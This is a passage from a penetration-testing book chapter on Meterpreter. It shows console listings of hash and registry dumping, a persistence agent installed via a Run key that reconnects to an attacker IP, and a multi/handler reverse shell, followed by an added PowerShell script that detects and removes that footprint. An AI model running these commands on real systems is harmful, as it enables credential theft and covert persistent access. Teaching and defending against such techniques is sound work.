Chapter 6
meterpreter > run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)
Using Persistence
Meterpreter's persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after the target system reboots. If this is a reverse connection, you can set the interval at which the target connects back to the attacker machine. If it's a bind, you can have it attempt to bind on an interface at a given time.
WARNING
If you use this functionality, be sure that you remove it after you’re done. If you forget to
do this, any attacker can also gain access to the system without authentication!
In the following listing, we run persistence and tell Windows to autostart the agent at boot time (-X), wait 50 seconds (-i 50) between connection retries, connect back on port 443 (-p 443), and connect to the attacker IP 192.168.33.129 (-r 192.168.33.129). The script uploads a VBS agent to the target's TEMP directory and registers it under a randomly named HKLM Run key; both of these are the artifacts you must remove when you are done. We then establish a listener for the agent with use multi/handler, and after setting the payload, LPORT, and LHOST to match what we gave persistence and running exploit, we see the connection come in as expected.
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.33.129
[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)
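The listing above shows exactly what the persistence script leaves behind: a .vbs agent in C:\WINDOWS\TEMP and a randomly named value under HKLM\...\CurrentVersion\Run. The following PowerShell script is an added example, not code from the book or from Metasploit, for auditing a host for that pattern (a script file launched from a TEMP directory via a Run key) and, with -Remove, killing the script host, deleting the Run value and deleting the file. It assumes it is run elevated on the target host (HKLM is read-only otherwise), and because the value and file names are randomised it matches on the command line rather than on any particular name.

```powershell
# Added example (not from the book): find and optionally remove script-based
# autoruns launched from a TEMP directory, the footprint of the persistence
# script above. Assumes an elevated PowerShell session on the target host.
param(
    [switch]$Remove
)

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)

# A script file (.vbs etc.) referenced from a \temp\ path or %TEMP%
$suspicious = '(?i)(\\temp\\|%temp%).*\.(vbs|vbe|js|bat|ps1)\b'

$findings = foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Skip the provider metadata that Get-ItemProperty attaches
        if ($p.Name -in 'PSPath','PSParentPath','PSChildName','PSDrive','PSProvider') { continue }
        if ($p.Value -is [string] -and $p.Value -match $suspicious) {
            [pscustomobject]@{ Key = $key; Name = $p.Name; Command = $p.Value }
        }
    }
}

if (-not $findings) {
    Write-Host 'No script autoruns from a TEMP directory found.'
    return
}

$findings | Format-Table -AutoSize

if ($Remove) {
    foreach ($f in $findings) {
        # Extract the script path so we can stop its running script host
        $path = [regex]::Match($f.Command, '(?i)[a-z]:\\[^"]+\.(vbs|vbe|js|bat|ps1)').Value
        Get-CimInstance Win32_Process -Filter "Name='wscript.exe' OR Name='cscript.exe'" |
            Where-Object { $path -and $_.CommandLine -like "*$path*" } |
            ForEach-Object { Stop-Process -Id $_.ProcessId -Force }
        Remove-ItemProperty -Path $f.Key -Name $f.Name
        if ($path -and (Test-Path $path)) { Remove-Item -Path $path -Force }
        Write-Host "Removed $($f.Key)\$($f.Name) and $path"
    }
}
```

Run it once without -Remove to review what it found (an engagement may have legitimate Run entries that point into a temp directory), then with -Remove to clean up. Killing wscript.exe before deleting the file matters: the agent keeps retrying the connection every 50 seconds while it runs, and an open handle can also prevent the file from being deleted.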